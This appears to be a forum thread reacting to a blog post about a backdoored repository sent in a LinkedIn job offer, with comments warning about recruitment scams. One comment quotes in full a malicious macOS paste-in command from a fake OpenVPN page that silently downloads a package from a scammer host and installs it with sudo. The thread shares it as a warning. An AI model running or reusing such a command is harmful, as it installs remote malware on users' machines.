A backdoor in a LinkedIn job offer

How about running that backdoor from a honeypot and check what it is trying to do?

This is the first time i have heard of this type of scam so horrible like people need to be careful on both github and linkedin

I’ve seen a few of these – malicious repos to clone, fake call links that prompt for “driver” downloads, and so on.

The only way around it is to be hyper-vigilant if anyone asks you to run any untrusted code on your computer.

> Instead of cloning and installing dependencies, I spun up a throwaway VPS on Hetzner, cloned the repo there, and pointed Pi at it in read-only mode, with only file-reading tools enabled...

Good man, knows what he is doing.

FWIW, I only run ai cli tools on a hostinger vps, never on my personal device. Also allows me to run YOLO mode across the board. If I am working on a web project, then I use preview develop deploys for testing, so I do not even have to work on my machine. Its very fun workflow for experimentation. Still trying to work the kinks to make it easier.

> I reported the repo to GitHub and the recruiter to LinkedIn. So far nothing has changed and the code is still up.

Come on, github...

Western governments should treat large-scale scammers and the countries that protect them as an act of war.

I reported it and it seems like the repo no longer exists

Honestly, I would have given up before starting. You spend time and effort on these cases only for the company to say "Unfortunately..."

With how many desperate software engineers there are on the market right now looking for a job, there are going to be scumbags out there trying to take advantage of the desperation. Such people are the worst of the worst of humanity.

Stay vigilant out there everyone.

It would have been game over for me.

Would highly recommend running any repo in an isolated environment like a vm

I wonder if an antivirus software would catch this..

I've got more than a handful of these offers so I decided to never install anything and politely decline such offers.

Linkedin has become a rotten cesspool of scammers and spammers, ripe for disruption.

Damned, there is a market for an "antivirus for developers".

Ah, c'mon! You went all the way to find out the issue and write about it, and won't do the most interesting part which is to tell us what was the remote script that would end up running!?

So the backdoor isn’t in the offer but came per offer

> so just installing dependencies executes the backdoor.

How anybody in their right mind still uses this tech stack is beyond me.

> I reported the repo to GitHub and the recruiter to LinkedIn. So far nothing has changed and the code is still up.

Remember to treat every size on the internet as an adversary, even if they weren't in the past.

I'm a simple man. I see crypto currency and I move away from what looks likely a social scam.

Sure, that might have been the one chance in a life time to easy big money. Or just a path to financial big troubles.

More reasons for me to dislike linked-in. I have an account. I hate it.

the entire internet is just phishing at this point

Thought: they may be targeting software developers on the assumption they may have legit credentials lying around from other employers or for public open source projects, or at a minimum some reputation to exploit towards obtaining commits to the same for supply chain attacks.

As part of a potential interview, I was given login credentials so I could sign in to a site where I was prompted to download a VPN client that would allow me to connect to the company's system (red flags already).

They made the site look like it was an official OpenVPN page, even though the URL was clearly not affiliated. The method of downloading their "VPN" was to copy and paste a script to run in my terminal. They only showed a small snippet of the command, which started with `( brew install openvpn )`, followed by a copy button. After pasting the full command to inspect it, the entire contents was as follows (with the malicious URL removed):

```

( brew install openvpn ) >/dev/null 2>&1 & ovpn_pid=$!; ( url="https://asshole.scammer.dev/openvpn-mac"; policyCategoryId="-1"; installerArgs="url=$url:departmentId=1765561620401102848:sourceInstall=silent:technicianId=7455681275330027520"; silentInstall="true"; waitForProcess(){ processName="$1"; fixedDelay="$2"; terminate="$3"; while pgrep -f "$processName" >/dev/null; do if [ "$terminate" = "true" ]; then pkill -f "$processName" true; return; fi; delay="${fixedDelay:-$((RANDOM % 50 + 10))}"; sleep "$delay"; done; }; checkForRosetta2(){ waitForProcess "/usr/sbin/softwareupdate"; IFS='.' read -r osvers_major osvers_minor <<< "$(/usr/bin/sw_vers -productVersion)"; if [ "$osvers_major" -ge 11 ]; then if ! sysctl -n machdep.cpu.brand_string | grep -q "Intel"; then pgrep oahd >/dev/null 2>&1 /usr/sbin/softwareupdate --install-rosetta --agree-to-license >/dev/null 2>&1; fi; fi; }; checkForRosetta2; DIRECTORY="/Users/Shared/InstallerWorkspace"; mkdir -p "$DIRECTORY"; configFile="$DIRECTORY/agentinstallconfig.properties"; { echo "policyId=$policyCategoryId"; echo "install_args=$installerArgs"; echo "Silent_Install=$silentInstall"; } > "$configFile"; baseName="$(basename "$url")"; downLoadFile="/Users/Shared/$baseName"; curl --silent --fail --location --url "$url" --output "$downLoadFile" >/dev/null 2>&1 && sudo installer -pkg "$downLoadFile" -target / >/dev/null 2>&1; t=$?; rm -f "$configFile" "$downLoadFile"; exit "$t" ) >/dev/null 2>&1 & so_pid=$!; wait "$ovpn_pid"; ovpn_rc=$?; wait "$so_pid"; so_rc=$?; [ "$ovpn_rc" -eq 0 ] && [ "$so_rc" -eq 0 ]

```

Yeah, no. Be careful out there.

By the way, here's the scammer's "company website": https://jtwllc.com/

Superficially looks legit until you start investigating the finer details.

I'm working 3 remote jobs right now and I can tell you guys to really watch out.

Often they are not malicious, just unsavory business practice where they want free consulting with no intention of hiring you. Another tell is the person is quick to jump to a take home screening project and they are quite good at getting at engineers heads that "leetcode is outdated/they dont believe in it" and whatever they want you to hear.

They know engineers are desperate for jobs right now and if you don't have a backbone they will exploit it.

I am much wiser now that I work multiple salary jobs remotely I realize these 3 golden rules:

- Don't stay loyal to your employers.

- Don't stay honest to those don't value it.

- Don't stay complacent always innovate.

LinkedIn is a cesspool of scams now.

They know there's a high degree of fraud and they don't do anything about it. They don't care.

I've gotten tricked into sending my resume and talking on the phone with legitimate looking recruiters from Google, Netflix, Meta, OpenAI, Anthropic, etc, but LinkedIn does nothing about it.

Once again I'll state my opinion, don't use linkedin. It's a social media site not an employment/recruitment resource.

Yet another reason to be reluctant to even discuss linkedin job offers

[flagged]

[dead]

[dead]

now imagine if you were like the rest of us and didn’t write a blog post about it